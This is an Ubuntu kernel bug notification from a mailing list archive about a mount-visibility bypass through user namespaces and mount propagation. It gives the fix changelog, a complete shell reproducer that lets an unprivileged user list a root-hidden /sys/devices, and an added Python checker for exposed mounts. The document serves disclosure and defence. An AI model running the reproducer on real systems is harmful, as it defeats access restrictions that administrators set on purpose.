group.of.nepali.translators team mailing list archive

[Bug 1789161] Re: Bypass of mount visibility through userns + mount propagation

 

This bug was fixed in the package linux - 3.13.0-163.213

---------------
linux (3.13.0-163.213) trusty; urgency=medium

  * linux: 3.13.0-163.213 -proposed tracker (LP: #1802769)

  * Bypass of mount visibility through userns + mount propagation (LP: #1789161)
    - mount: Retest MNT_LOCKED in do_umount
    - mount: Don't allow copying MNT_UNBINDABLE|MNT_LOCKED mounts

  * dev test in ubuntu_stress_smoke_test cause kernel oops on T-3.13
    (LP: #1797546)
    - drm: fix NULL pointer access by wrong ioctl

  * Packaging resync (LP: #1786013)
    - [Package] add support for specifying the primary makefile

 -- Thadeu Lima de Souza Cascardo <cascardo@xxxxxxxxxxxxx>  Tue, 13 Nov 2018 13:30:30 -0200

** Changed in: linux (Ubuntu Trusty)
       Status: Fix Committed => Fix Released

** Changed in: linux (Ubuntu Cosmic)
       Status: Fix Committed => Fix Released

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-18653

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-18955

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-6559

-- 
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1789161

Title:
  Bypass of mount visibility through userns + mount propagation

Status in linux package in Ubuntu:
  Fix Committed
Status in linux source package in Trusty:
  Fix Released
Status in linux source package in Xenial:
  Fix Committed
Status in linux source package in Bionic:
  Fix Committed
Status in linux source package in Cosmic:
  Fix Released
Status in linux source package in Disco:
  Fix Committed

Bug description:
  [Impact]

  Jonathan Calmels from NVIDIA reported that he's able to bypass the
  mount visibility security check in place in the Linux kernel by using
  a combination of the unbindable property along with the private mount
  propagation option to allow an unprivileged user to see a path which
  was purposefully hidden by the root user.

  [Test Case]

  Reproducer:
  # Hide a path to all users using a tmpfs
  root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
  root@castiana:~#

  # As an unprivileged user, unshare user namespace and mount namespace
  stgraber@castiana:~$ unshare -U -m -r

  # Confirm the path is still not accessible
  root@castiana:~# ls /sys/devices/

  # Make /sys recursively unbindable and private
  root@castiana:~# mount --make-runbindable /sys
  root@castiana:~# mount --make-private /sys

  # Recursively bind-mount the rest of /sys over to /mnt
  root@castiana:~# mount --rbind /sys/ /mnt

  # Access our hidden /sys/devices as an unprivileged user
  root@castiana:~# ls /mnt/devices/
  breakpoint  cpu  cstate_core  cstate_pkg  i915  intel_pt  isa  kprobe  LNXSYSTM:00  msr  pci0000:00  platform  pnp0  power  software  system  tracepoint  uncore_arb  uncore_cbox_0  uncore_cbox_1  uprobe  virtual

  [Regression Potential]

  Low. The fixes are relatively simple. Regressions would most likely be
  specific to software utilizing user namespaces + mount propagation
  which is a small (but often important) portion of the Ubuntu archive.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+subscriptions
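
An added example, not part of the original bug report or the kernel fix: a Python check that parses mountinfo text and reports any path that is covered by a child mount in one place but reachable uncovered through another mount of the same filesystem, which is the state the reproducer above ends in. The sample mountinfo lines, mount IDs and function names are constructed for illustration.

```python
import posixpath

# Constructed sample: mountinfo as it could look inside the unprivileged
# namespace after the reproducer's rbind (IDs and options are made up).
SAMPLE_VULNERABLE = """\
28 0 8:1 / / rw,relatime - ext4 /dev/sda1 rw
22 28 0:21 / /sys rw,nosuid,nodev,noexec,relatime - sysfs sysfs rw
95 22 0:45 / /sys/devices rw,relatime - tmpfs tmpfs rw
120 28 0:21 / /mnt rw,nosuid,nodev,noexec,relatime - sysfs sysfs rw
"""
# Constructed sample: the covering tmpfs travelled with the bind mount.
SAMPLE_COVERED = (SAMPLE_VULNERABLE +
                  "121 120 0:45 / /mnt/devices rw,relatime - tmpfs tmpfs rw\n")

def parse_mountinfo(text):
    """Return id, parent id, device, fs root and mount point of each entry."""
    mounts = []
    for line in text.splitlines():
        f = line.split()
        if len(f) >= 10 and "-" in f:  # "-" separates the optional fields
            mounts.append({"id": f[0], "parent": f[1], "dev": f[2],
                           "root": f[3], "mp": f[4]})
    return mounts

def under(path, base):
    """True if path equals base or lies below it."""
    return path == base or path.startswith(base.rstrip("/") + "/")

def find_exposed(text):
    """List (covered mount point, uncovered alias) pairs.
    Simplification: only direct child mounts count as covers."""
    mounts = parse_mountinfo(text)
    kids = {}
    for m in mounts:
        kids.setdefault(m["parent"], []).append(m["mp"])
    findings = []
    for m in mounts:
        for cover in kids.get(m["id"], []):
            # Path inside the filesystem that the child mount hides.
            rel = posixpath.relpath(cover, m["mp"])
            fs_path = posixpath.normpath(posixpath.join(m["root"], rel))
            for n in mounts:  # other mounts of the same filesystem
                if n["dev"] != m["dev"] or not under(fs_path, n["root"]):
                    continue
                rel_n = posixpath.relpath(fs_path, n["root"])
                loc = posixpath.normpath(posixpath.join(n["mp"], rel_n))
                if not any(under(loc, c) for c in kids.get(n["id"], [])):
                    findings.append((cover, loc))
    return findings
```

On a live system the same function can be given the contents of /proc/self/mountinfo read from inside the namespace being audited; an empty result means every covered path it found is covered at each alias too.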